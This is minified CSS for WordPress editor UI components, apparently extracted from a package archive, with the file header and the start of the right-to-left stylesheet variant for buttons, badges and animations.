(prefers-reduced-motion){.components-resizable-box__side-handle.components-resizable-box__handle-bottom:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-bottom:hover:before,.components-resizable-box__side-handle.components-resizable-box__handle-top:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-top:hover:before{animation:components-resizable-box__top-bottom-animation .1s ease-out 0s;animation-fill-mode:forwards}.components-resizable-box__side-handle.components-resizable-box__handle-left:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-left:hover:before,.components-resizable-box__side-handle.components-resizable-box__handle-right:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-right:hover:before{animation:components-resizable-box__left-right-animation .1s ease-out 0s;animation-fill-mode:forwards}}@media not all and (min-resolution:0.001dpcm){@supports (-webkit-appearance:none){.components-resizable-box__side-handle.components-resizable-box__handle-bottom:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-bottom:hover:before,.components-resizable-box__side-handle.components-resizable-box__handle-left:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-left:hover:before,.components-resizable-box__side-handle.components-resizable-box__handle-right:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-right:hover:before,.components-resizable-box__side-handle.components-resizable-box__handle-top:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-top:hover:before{animation:none}}}@keyframes components-resizable-box__top-bottom-animation{0%{opacity:0;transform:scaleX(0)}to{opacity:1;transform:scaleX(1)}}@keyframes components-resizable-box__left-right-animation{0%{opacity:0;transform:scaleY(0)}to{opacity:1;transform:scaleY(1)}} /*!rtl:begin:ignore*/.components-resizable-box__handle-right{right:-11.5px}.components-resizable-box__handle-left{left:-11.5px}.components-resizable-box__handle-top{top:-11.5px}.components-resizable-box__handle-bottom{bottom:-11.5px} /*!rtl:end:ignore*/.components-responsive-wrapper{align-items:center;display:flex;justify-content:center;max-width:100%;position:relative}.components-responsive-wrapper__content{display:block;max-width:100%;width:100%}.components-sandbox{overflow:hidden}iframe.components-sandbox{width:100%}body.lockscroll,html.lockscroll{overflow:hidden}.components-select-control__input{outline:0;-webkit-tap-highlight-color:rgba(0,0,0,0)!important}.components-snackbar{backdrop-filter:blur(16px) saturate(180%);background:#000000d9;border-radius:4px;box-shadow:0 1px 2px #0000000d,0 2px 3px #0000000a,0 6px 6px #00000008,0 8px 8px #00000005;box-sizing:border-box;color:#fff;cursor:pointer;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;max-width:600px;padding:12px 20px;pointer-events:auto;width:100%}@media (min-width:600px){.components-snackbar{width:fit-content}}.components-snackbar:focus{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-snackbar.components-snackbar-explicit-dismiss{cursor:default}.components-snackbar .components-snackbar__content-with-icon{padding-left:24px;position:relative}.components-snackbar .components-snackbar__icon{left:-8px;position:absolute;top:-2.9px}.components-snackbar .components-snackbar__dismiss-button{cursor:pointer;margin-left:24px}.components-snackbar__action.components-button,.components-snackbar__action.components-external-link{color:#fff;flex-shrink:0;margin-left:32px}.components-snackbar__action.components-button:focus,.components-snackbar__action.components-external-link:focus{box-shadow:none;outline:1px dotted #fff}.components-snackbar__action.components-button:hover,.components-snackbar__action.components-external-link:hover{color:currentColor;text-decoration:none}.components-snackbar__content{align-items:baseline;display:flex;justify-content:space-between;line-height:1.4}.components-snackbar-list{box-sizing:border-box;pointer-events:none;position:absolute;width:100%;z-index:100000}.components-snackbar-list__notice-container{padding-top:8px;position:relative}.components-tab-panel__tabs{align-items:stretch;display:flex;flex-direction:row}.components-tab-panel__tabs[aria-orientation=vertical]{flex-direction:column}.components-tab-panel__tabs-item{background:#0000;border:none;border-radius:0;box-shadow:none;cursor:pointer;font-weight:500;height:48px!important;margin-left:0;padding:3px 16px;position:relative}.components-tab-panel__tabs-item:focus:not(:disabled){box-shadow:none;outline:none;position:relative}.components-tab-panel__tabs-item:after{background:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));border-radius:0;bottom:0;content:"";height:calc(var(--wp-admin-border-width-focus)*0);left:0;pointer-events:none;position:absolute;right:0}@media not (prefers-reduced-motion){.components-tab-panel__tabs-item:after{transition:all .1s linear}}.components-tab-panel__tabs-item.is-active:after{height:calc(var(--wp-admin-border-width-focus)*1);outline:2px solid #0000;outline-offset:-1px}.components-tab-panel__tabs-item:before{border-radius:2px;bottom:12px;box-shadow:0 0 0 0 #0000;content:"";left:12px;pointer-events:none;position:absolute;right:12px;top:12px}@media not (prefers-reduced-motion){.components-tab-panel__tabs-item:before{transition:all .1s linear}}.components-tab-panel__tabs-item:focus-visible:before{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:2px solid #0000}.components-tab-panel__tab-content:focus{box-shadow:none;outline:none}.components-tab-panel__tab-content:focus-visible{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:2px solid #0000;outline-offset:0}.components-text-control__input,.components-text-control__input[type=color],.components-text-control__input[type=date],.components-text-control__input[type=datetime-local],.components-text-control__input[type=datetime],.components-text-control__input[type=email],.components-text-control__input[type=month],.components-text-control__input[type=number],.components-text-control__input[type=password],.components-text-control__input[type=tel],.components-text-control__input[type=text],.components-text-control__input[type=time],.components-text-control__input[type=url],.components-text-control__input[type=week]{background:var(--wp-components-color-background,#fff);border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;color:var(--wp-components-color-foreground,#1e1e1e);font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;height:32px;line-height:normal;margin:0;padding:6px 8px;width:100%}@media not (prefers-reduced-motion){.components-text-control__input,.components-text-control__input[type=color],.components-text-control__input[type=date],.components-text-control__input[type=datetime-local],.components-text-control__input[type=datetime],.components-text-control__input[type=email],.components-text-control__input[type=month],.components-text-control__input[type=number],.components-text-control__input[type=password],.components-text-control__input[type=tel],.components-text-control__input[type=text],.components-text-control__input[type=time],.components-text-control__input[type=url],.components-text-control__input[type=week]{transition:box-shadow .1s linear}}@media (min-width:600px){.components-text-control__input,.components-text-control__input[type=color],.components-text-control__input[type=date],.components-text-control__input[type=datetime-local],.components-text-control__input[type=datetime],.components-text-control__input[type=email],.components-text-control__input[type=month],.components-text-control__input[type=number],.components-text-control__input[type=password],.components-text-control__input[type=tel],.components-text-control__input[type=text],.components-text-control__input[type=time],.components-text-control__input[type=url],.components-text-control__input[type=week]{font-size:13px;line-height:normal}}.components-text-control__input:focus,.components-text-control__input[type=color]:focus,.components-text-control__input[type=date]:focus,.components-text-control__input[type=datetime-local]:focus,.components-text-control__input[type=datetime]:focus,.components-text-control__input[type=email]:focus,.components-text-control__input[type=month]:focus,.components-text-control__input[type=number]:focus,.components-text-control__input[type=password]:focus,.components-text-control__input[type=tel]:focus,.components-text-control__input[type=text]:focus,.components-text-control__input[type=time]:focus,.components-text-control__input[type=url]:focus,.components-text-control__input[type=week]:focus{border-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));box-shadow:0 0 0 .5px var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:2px solid #0000}.components-text-control__input::-webkit-input-placeholder,.components-text-control__input[type=color]::-webkit-input-placeholder,.components-text-control__input[type=date]::-webkit-input-placeholder,.components-text-control__input[type=datetime-local]::-webkit-input-placeholder,.components-text-control__input[type=datetime]::-webkit-input-placeholder,.components-text-control__input[type=email]::-webkit-input-placeholder,.components-text-control__input[type=month]::-webkit-input-placeholder,.components-text-control__input[type=number]::-webkit-input-placeholder,.components-text-control__input[type=password]::-webkit-input-placeholder,.components-text-control__input[type=tel]::-webkit-input-placeholder,.components-text-control__input[type=text]::-webkit-input-placeholder,.components-text-control__input[type=time]::-webkit-input-placeholder,.components-text-control__input[type=url]::-webkit-input-placeholder,.components-text-control__input[type=week]::-webkit-input-placeholder{color:#1e1e1e9e}.components-text-control__input::-moz-placeholder,.components-text-control__input[type=color]::-moz-placeholder,.components-text-control__input[type=date]::-moz-placeholder,.components-text-control__input[type=datetime-local]::-moz-placeholder,.components-text-control__input[type=datetime]::-moz-placeholder,.components-text-control__input[type=email]::-moz-placeholder,.components-text-control__input[type=month]::-moz-placeholder,.components-text-control__input[type=number]::-moz-placeholder,.components-text-control__input[type=password]::-moz-placeholder,.components-text-control__input[type=tel]::-moz-placeholder,.components-text-control__input[type=text]::-moz-placeholder,.components-text-control__input[type=time]::-moz-placeholder,.components-text-control__input[type=url]::-moz-placeholder,.components-text-control__input[type=week]::-moz-placeholder{color:#1e1e1e9e}.components-text-control__input:-ms-input-placeholder,.components-text-control__input[type=color]:-ms-input-placeholder,.components-text-control__input[type=date]:-ms-input-placeholder,.components-text-control__input[type=datetime-local]:-ms-input-placeholder,.components-text-control__input[type=datetime]:-ms-input-placeholder,.components-text-control__input[type=email]:-ms-input-placeholder,.components-text-control__input[type=month]:-ms-input-placeholder,.components-text-control__input[type=number]:-ms-input-placeholder,.components-text-control__input[type=password]:-ms-input-placeholder,.components-text-control__input[type=tel]:-ms-input-placeholder,.components-text-control__input[type=text]:-ms-input-placeholder,.components-text-control__input[type=time]:-ms-input-placeholder,.components-text-control__input[type=url]:-ms-input-placeholder,.components-text-control__input[type=week]:-ms-input-placeholder{color:#1e1e1e9e}.components-text-control__input,.components-text-control__input[type=color],.components-text-control__input[type=date],.components-text-control__input[type=datetime-local],.components-text-control__input[type=datetime],.components-text-control__input[type=email],.components-text-control__input[type=month],.components-text-control__input[type=number],.components-text-control__input[type=password],.components-text-control__input[type=tel],.components-text-control__input[type=text],.components-text-control__input[type=time],.components-text-control__input[type=url],.components-text-control__input[type=week]{border-color:var(--wp-components-color-gray-600,#949494)}.components-text-control__input::placeholder,.components-text-control__input[type=color]::placeholder,.components-text-control__input[type=date]::placeholder,.components-text-control__input[type=datetime-local]::placeholder,.components-text-control__input[type=datetime]::placeholder,.components-text-control__input[type=email]::placeholder,.components-text-control__input[type=month]::placeholder,.components-text-control__input[type=number]::placeholder,.components-text-control__input[type=password]::placeholder,.components-text-control__input[type=tel]::placeholder,.components-text-control__input[type=text]::placeholder,.components-text-control__input[type=time]::placeholder,.components-text-control__input[type=url]::placeholder,.components-text-control__input[type=week]::placeholder{color:color-mix(in srgb,var(--wp-components-color-foreground,#1e1e1e),#0000 38%)}.components-text-control__input.is-next-40px-default-size,.components-text-control__input[type=color].is-next-40px-default-size,.components-text-control__input[type=date].is-next-40px-default-size,.components-text-control__input[type=datetime-local].is-next-40px-default-size,.components-text-control__input[type=datetime].is-next-40px-default-size,.components-text-control__input[type=email].is-next-40px-default-size,.components-text-control__input[type=month].is-next-40px-default-size,.components-text-control__input[type=number].is-next-40px-default-size,.components-text-control__input[type=password].is-next-40px-default-size,.components-text-control__input[type=tel].is-next-40px-default-size,.components-text-control__input[type=text].is-next-40px-default-size,.components-text-control__input[type=time].is-next-40px-default-size,.components-text-control__input[type=url].is-next-40px-default-size,.components-text-control__input[type=week].is-next-40px-default-size{height:40px;padding-left:12px;padding-right:12px}.components-text-control__input[type=email],.components-text-control__input[type=url]{direction:ltr}.components-tip{color:#757575;display:flex}.components-tip svg{align-self:center;fill:#f0b849;flex-shrink:0;margin-right:16px}.components-tip p{margin:0}.components-toggle-control__label{line-height:16px}.components-toggle-control__label:not(.is-disabled){cursor:pointer}.components-toggle-control__help{display:inline-block;margin-inline-start:40px}.components-accessible-toolbar{border:1px solid var(--wp-components-color-foreground,#1e1e1e);border-radius:2px;display:inline-flex;flex-shrink:0}.components-accessible-toolbar>.components-toolbar-group:last-child{border-right:none}.components-accessible-toolbar.is-unstyled{border:none}.components-accessible-toolbar.is-unstyled>.components-toolbar-group{border-right:none}.components-accessible-toolbar[aria-orientation=vertical],.components-toolbar[aria-orientation=vertical]{align-items:center;display:flex;flex-direction:column}.components-accessible-toolbar .components-button,.components-toolbar .components-button{height:48px;padding-left:16px;padding-right:16px;position:relative;z-index:1}.components-accessible-toolbar .components-button:focus:not(:disabled),.components-toolbar .components-button:focus:not(:disabled){box-shadow:none;outline:none}.components-accessible-toolbar .components-button:before,.components-toolbar .components-button:before{border-radius:2px;content:"";display:block;height:32px;left:8px;position:absolute;right:8px;z-index:-1}@media not (prefers-reduced-motion){.components-accessible-toolbar .components-button:before,.components-toolbar .components-button:before{animation:components-button__appear-animation .1s ease;animation-fill-mode:forwards}}.components-accessible-toolbar .components-button svg,.components-toolbar .components-button svg{margin-left:auto;margin-right:auto;position:relative}.components-accessible-toolbar .components-button.is-pressed,.components-accessible-toolbar .components-button.is-pressed:hover,.components-toolbar .components-button.is-pressed,.components-toolbar .components-button.is-pressed:hover{background:#0000}.components-accessible-toolbar .components-button.is-pressed:before,.components-toolbar .components-button.is-pressed:before{background:var(--wp-components-color-foreground,#1e1e1e)}.components-accessible-toolbar .components-button:focus:before,.components-toolbar .components-button:focus:before{box-shadow:inset 0 0 0 1px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.components-accessible-toolbar .components-button.has-icon.has-icon,.components-toolbar .components-button.has-icon.has-icon{min-width:48px;padding-left:8px;padding-right:8px}@keyframes components-button__appear-animation{0%{transform:scaleY(0)}to{transform:scaleY(1)}}.components-toolbar__control.components-button{position:relative}.components-toolbar__control.components-button[data-subscript] svg{padding:5px 10px 5px 0}.components-toolbar__control.components-button[data-subscript]:after{bottom:10px;content:attr(data-subscript);font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:600;line-height:12px;position:absolute;right:8px}.components-toolbar__control.components-button:not(:disabled).is-pressed[data-subscript]:after{color:#fff}.components-toolbar-group{background-color:var(--wp-components-color-background,#fff);border-right:1px solid var(--wp-components-color-foreground,#1e1e1e);display:inline-flex;flex-shrink:0;flex-wrap:wrap;min-height:48px;padding-left:6px;padding-right:6px}.components-toolbar-group .components-toolbar-group.components-toolbar-group{border-width:0;margin:0}.components-toolbar-group{line-height:0}.components-toolbar-group .components-button.components-button,.components-toolbar-group .components-button.has-icon.has-icon{justify-content:center;min-width:36px;padding-left:6px;padding-right:6px}.components-toolbar-group .components-button.components-button svg,.components-toolbar-group .components-button.has-icon.has-icon svg{min-width:24px}.components-toolbar-group .components-button.components-button:before,.components-toolbar-group .components-button.has-icon.has-icon:before{left:2px;right:2px}.components-toolbar{background-color:var(--wp-components-color-background,#fff);border:1px solid var(--wp-components-color-foreground,#1e1e1e);display:inline-flex;flex-shrink:0;flex-wrap:wrap;margin:0;min-height:48px}.components-toolbar .components-toolbar.components-toolbar{border-width:0;margin:0}div.components-toolbar>div{display:flex;margin:0}div.components-toolbar>div+div.has-left-divider{margin-left:6px;overflow:visible;position:relative}div.components-toolbar>div+div.has-left-divider:before{background-color:#ddd;box-sizing:initial;content:"";display:inline-block;height:20px;left:-3px;position:absolute;top:8px;width:1px}.components-tooltip{background:#000;border-radius:2px;box-shadow:0 1px 2px #0000000d,0 2px 3px #0000000a,0 6px 6px #00000008,0 8px 8px #00000005;color:#f0f0f0;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:12px;line-height:1.4;padding:4px 8px;text-align:center;z-index:1000002}.components-tooltip__shortcut{margin-left:8px}.components-validated-control:has(:is(input,select):user-invalid) .components-input-control__backdrop{--wp-components-color-accent:#cc1818;border-color:#cc1818}.components-validated-control :is(textarea,input[type=text]):user-invalid{--wp-admin-theme-color:#cc1818;--wp-components-color-accent:#cc1818;border-color:#cc1818}.components-validated-control .components-combobox-control__suggestions-container:has(input:user-invalid):not(:has([aria-expanded=true])){border-color:#cc1818}.components-validated-control__wrapper-with-error-delegate{position:relative}.components-validated-control__wrapper-with-error-delegate:has(select:user-invalid) .components-input-control__backdrop{--wp-components-color-accent:#cc1818;border-color:#cc1818}.components-validated-control__wrapper-with-error-delegate:has(input[type=radio]:invalid){--wp-components-color-accent:#cc1818}.components-validated-control__wrapper-with-error-delegate:has(input:user-invalid) .components-form-token-field__input-container:not(:has([aria-expanded=true])){--wp-components-color-accent:#cc1818;border-color:#cc1818}.components-validated-control__error-delegate{height:100%;opacity:0;pointer-events:none;position:absolute;top:0;width:100%}.components-validated-control__indicator{align-items:flex-start;animation:components-validated-control__indicator-jump .2s cubic-bezier(.68,-.55,.27,1.55);color:var(--wp-components-color-gray-700,#757575);display:flex;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:.75rem;gap:4px;line-height:16px;margin:8px 0 0}.components-validated-control__indicator.is-invalid{color:#cc1818}.components-validated-control__indicator.is-valid{color:color-mix(in srgb,#000 30%,#4ab866)}.components-validated-control__indicator-icon{flex-shrink:0}.components-validated-control__indicator-spinner{height:12px;margin:2px;width:12px}@keyframes components-validated-control__indicator-jump{0%{opacity:0;transform:translateY(-4px)}to{opacity:1;transform:translateY(0)}}:root{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}PK!Ӹdist/components/style-rtl.cssnuȯ@charset "UTF-8"; @media not (prefers-reduced-motion){ .components-animate__appear{ animation:components-animate__appear-animation .1s cubic-bezier(0, 0, .2, 1) 0s; animation-fill-mode:forwards; } } .components-animate__appear.is-from-top,.components-animate__appear.is-from-top.is-from-left{ transform-origin:top right; } .components-animate__appear.is-from-top.is-from-right{ transform-origin:top left; } .components-animate__appear.is-from-bottom,.components-animate__appear.is-from-bottom.is-from-left{ transform-origin:bottom right; } .components-animate__appear.is-from-bottom.is-from-right{ transform-origin:bottom left; } @keyframes components-animate__appear-animation{ 0%{ transform:translateY(-2em) scaleY(0) scaleX(0); } to{ transform:translateY(0) scaleY(1) scaleX(1); } } @media not (prefers-reduced-motion){ .components-animate__slide-in{ animation:components-animate__slide-in-animation .1s cubic-bezier(0, 0, .2, 1); animation-fill-mode:forwards; } .components-animate__slide-in.is-from-left{ transform:translateX(-100%); } .components-animate__slide-in.is-from-right{ transform:translateX(100%); } } @keyframes components-animate__slide-in-animation{ to{ transform:translateX(0); } } @media not (prefers-reduced-motion){ .components-animate__loading{ animation:components-animate__loading 1.6s ease-in-out infinite; } } @keyframes components-animate__loading{ 0%{ opacity:.5; } 50%{ opacity:1; } to{ opacity:.5; } } .components-autocomplete__popover .components-popover__content{ min-width:200px; padding:8px; } .components-autocomplete__result.components-button{ display:flex; height:auto; min-height:36px; text-align:right; width:100%; } .components-autocomplete__result.components-button:focus:not(:disabled){ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .components-badge{ box-sizing:border-box; } .components-badge *,.components-badge :after,.components-badge :before{ box-sizing:inherit; } .components-badge{ background-color:color-mix(in srgb, #fff 90%, var(--base-color)); border-radius:2px; color:color-mix(in srgb, #000 50%, var(--base-color)); display:inline-block; line-height:0; max-width:100%; min-height:24px; padding:2px 8px; } .components-badge:where(.is-default){ background-color:#f0f0f0; color:#2f2f2f; } .components-badge.has-icon{ padding-inline-start:4px; } .components-badge.is-info{ --base-color:#3858e9; } .components-badge.is-warning{ --base-color:#f0b849; } .components-badge.is-error{ --base-color:#cc1818; } .components-badge.is-success{ --base-color:#4ab866; } .components-badge__flex-wrapper{ align-items:center; display:inline-flex; font-size:12px; font-weight:400; gap:2px; line-height:20px; max-width:100%; } .components-badge__icon{ flex-shrink:0; } .components-badge__content{ overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .components-button-group{ display:inline-block; } .components-button-group .components-button{ border-radius:0; box-shadow:inset 0 0 0 1px #1e1e1e; color:#1e1e1e; display:inline-flex; } .components-button-group .components-button+.components-button{ margin-right:-1px; } .components-button-group .components-button:first-child{ border-radius:0 2px 2px 0; } .components-button-group .components-button:last-child{ border-radius:2px 0 0 2px; } .components-button-group .components-button.is-primary,.components-button-group .components-button:focus{ position:relative; z-index:1; } .components-button-group .components-button.is-primary{ box-shadow:inset 0 0 0 1px #1e1e1e; } .components-button{ -webkit-appearance:none; background:none; border:0; cursor:pointer; display:inline-flex; font-family:inherit; font-size:13px; margin:0; text-decoration:none; } @media not (prefers-reduced-motion){ .components-button{ transition:box-shadow .1s linear; } } .components-button{ align-items:center; border-radius:2px; box-sizing:border-box; color:var(--wp-components-color-foreground, #1e1e1e); height:36px; padding:6px 12px; } .components-button.is-next-40px-default-size{ height:40px; } .components-button:hover:not(:disabled,[aria-disabled=true]),.components-button[aria-expanded=true]{ color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-button:focus:not(:disabled){ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:3px solid #0000; } .components-button.is-primary{ background:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); color:var(--wp-components-color-accent-inverted, #fff); outline:1px solid #0000; text-decoration:none; text-shadow:none; white-space:nowrap; } .components-button.is-primary:hover:not(:disabled){ background:var(--wp-components-color-accent-darker-10, var(--wp-admin-theme-color-darker-10, #2145e6)); color:var(--wp-components-color-accent-inverted, #fff); } .components-button.is-primary:active:not(:disabled){ background:var(--wp-components-color-accent-darker-20, var(--wp-admin-theme-color-darker-20, #183ad6)); border-color:var(--wp-components-color-accent-darker-20, var(--wp-admin-theme-color-darker-20, #183ad6)); color:var(--wp-components-color-accent-inverted, #fff); } .components-button.is-primary:focus:not(:disabled){ box-shadow:inset 0 0 0 1px var(--wp-components-color-background, #fff), 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-button.is-primary:disabled,.components-button.is-primary:disabled:active:enabled,.components-button.is-primary[aria-disabled=true],.components-button.is-primary[aria-disabled=true]:active:enabled,.components-button.is-primary[aria-disabled=true]:enabled{ background:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); color:#fff6; outline:none; } .components-button.is-primary:disabled:active:enabled:focus:enabled,.components-button.is-primary:disabled:focus:enabled,.components-button.is-primary[aria-disabled=true]:active:enabled:focus:enabled,.components-button.is-primary[aria-disabled=true]:enabled:focus:enabled,.components-button.is-primary[aria-disabled=true]:focus:enabled{ box-shadow:inset 0 0 0 1px var(--wp-components-color-background, #fff), 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-button.is-primary.is-busy,.components-button.is-primary.is-busy:disabled,.components-button.is-primary.is-busy[aria-disabled=true]{ background-image:linear-gradient(45deg, var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)) 33%, var(--wp-components-color-accent-darker-20, var(--wp-admin-theme-color-darker-20, #183ad6)) 33%, var(--wp-components-color-accent-darker-20, var(--wp-admin-theme-color-darker-20, #183ad6)) 70%, var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)) 70%); background-size:100px 100%; border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); color:var(--wp-components-color-accent-inverted, #fff); } .components-button.is-secondary,.components-button.is-tertiary{ outline:1px solid #0000; } .components-button.is-secondary:active:not(:disabled),.components-button.is-tertiary:active:not(:disabled){ box-shadow:none; } .components-button.is-secondary:disabled,.components-button.is-secondary[aria-disabled=true],.components-button.is-secondary[aria-disabled=true]:hover,.components-button.is-tertiary:disabled,.components-button.is-tertiary[aria-disabled=true],.components-button.is-tertiary[aria-disabled=true]:hover{ background:#0000; color:#949494; transform:none; } .components-button.is-secondary{ background:#0000; box-shadow:inset 0 0 0 1px var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)), 0 0 0 currentColor; color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:1px solid #0000; white-space:nowrap; } .components-button.is-secondary:hover:not(:disabled,[aria-disabled=true],.is-pressed){ background:color-mix(in srgb, var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)) 4%, #0000); box-shadow:inset 0 0 0 1px var(--wp-components-color-accent-darker-20, var(--wp-admin-theme-color-darker-20, #183ad6)); color:var(--wp-components-color-accent-darker-20, var(--wp-admin-theme-color-darker-20, #183ad6)); } .components-button.is-secondary:disabled:not(:focus),.components-button.is-secondary[aria-disabled=true]:hover:not(:focus),.components-button.is-secondary[aria-disabled=true]:not(:focus){ box-shadow:inset 0 0 0 1px #ddd; } .components-button.is-secondary:focus:not(:disabled){ box-shadow:0 0 0 currentColor inset, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-button.is-tertiary{ background:#0000; color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); white-space:nowrap; } .components-button.is-tertiary:hover:not(:disabled,[aria-disabled=true],.is-pressed){ background:color-mix(in srgb, var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)) 4%, #0000); color:var(--wp-components-color-accent-darker-20, var(--wp-admin-theme-color-darker-20, #183ad6)); } .components-button.is-tertiary:active:not(:disabled,[aria-disabled=true]){ background:color-mix(in srgb, var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)) 8%, #0000); } p+.components-button.is-tertiary{ margin-right:-6px; } .components-button.is-tertiary:disabled:not(:focus),.components-button.is-tertiary[aria-disabled=true]:hover:not(:focus),.components-button.is-tertiary[aria-disabled=true]:not(:focus){ box-shadow:none; outline:none; } .components-button.is-destructive{ --wp-components-color-accent:#cc1818; --wp-components-color-accent-darker-10:#9e1313; --wp-components-color-accent-darker-20:#710d0d; } .components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link){ color:#cc1818; } .components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link):hover:not(:disabled,[aria-disabled=true]){ color:#710d0d; } .components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link):focus{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) #cc1818; } .components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link):active:not(:disabled,[aria-disabled=true]){ background:#ccc; } .components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link):disabled,.components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link)[aria-disabled=true]{ color:#949494; } .components-button.is-destructive.is-secondary:hover:not(:disabled,[aria-disabled=true]),.components-button.is-destructive.is-tertiary:hover:not(:disabled,[aria-disabled=true]){ background:#cc18180a; } .components-button.is-destructive.is-secondary:active:not(:disabled,[aria-disabled=true]),.components-button.is-destructive.is-tertiary:active:not(:disabled,[aria-disabled=true]){ background:#cc181814; } .components-button.is-link{ background:none; border:0; border-radius:0; box-shadow:none; color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); margin:0; outline:none; padding:0; text-align:right; text-decoration:underline; } @media not (prefers-reduced-motion){ .components-button.is-link{ transition-duration:.05s; transition-property:border, background, color; transition-timing-function:ease-in-out; } } .components-button.is-link{ height:auto; } .components-button.is-link:focus{ border-radius:2px; } .components-button.is-link:disabled,.components-button.is-link[aria-disabled=true]{ color:#949494; } .components-button:not(:disabled,[aria-disabled=true]):active{ color:var(--wp-components-color-foreground, #1e1e1e); } .components-button:disabled,.components-button[aria-disabled=true]{ color:#949494; cursor:default; } @media not (prefers-reduced-motion){ .components-button.is-busy,.components-button.is-secondary.is-busy,.components-button.is-secondary.is-busy:disabled,.components-button.is-secondary.is-busy[aria-disabled=true]{ animation:components-button__busy-animation 2.5s linear infinite; } } .components-button.is-busy,.components-button.is-secondary.is-busy,.components-button.is-secondary.is-busy:disabled,.components-button.is-secondary.is-busy[aria-disabled=true]{ background-image:linear-gradient(45deg, #fafafa 33%, #e0e0e0 0, #e0e0e0 70%, #fafafa 0); background-size:100px 100%; } .components-button.is-compact{ height:32px; } .components-button.is-compact.has-icon:not(.has-text){ min-width:32px; padding:0; } .components-button.is-small{ font-size:11px; height:24px; line-height:22px; padding:0 8px; } .components-button.is-small.has-icon:not(.has-text){ min-width:24px; padding:0; } .components-button.has-icon{ justify-content:center; min-width:36px; padding:6px; } .components-button.has-icon.is-next-40px-default-size{ min-width:40px; } .components-button.has-icon .dashicon{ align-items:center; box-sizing:initial; display:inline-flex; justify-content:center; padding:2px; } .components-button.has-icon.has-text{ gap:4px; justify-content:start; padding-left:12px; padding-right:8px; } .components-button.has-icon.has-text.has-icon-right{ padding-left:8px; padding-right:12px; } .components-button.is-pressed,.components-button.is-pressed:hover{ color:var(--wp-components-color-foreground-inverted, #fff); } .components-button.is-pressed:hover:not(:disabled,[aria-disabled=true]),.components-button.is-pressed:not(:disabled,[aria-disabled=true]){ background:var(--wp-components-color-foreground, #1e1e1e); } .components-button.is-pressed:disabled,.components-button.is-pressed[aria-disabled=true]{ color:#949494; } 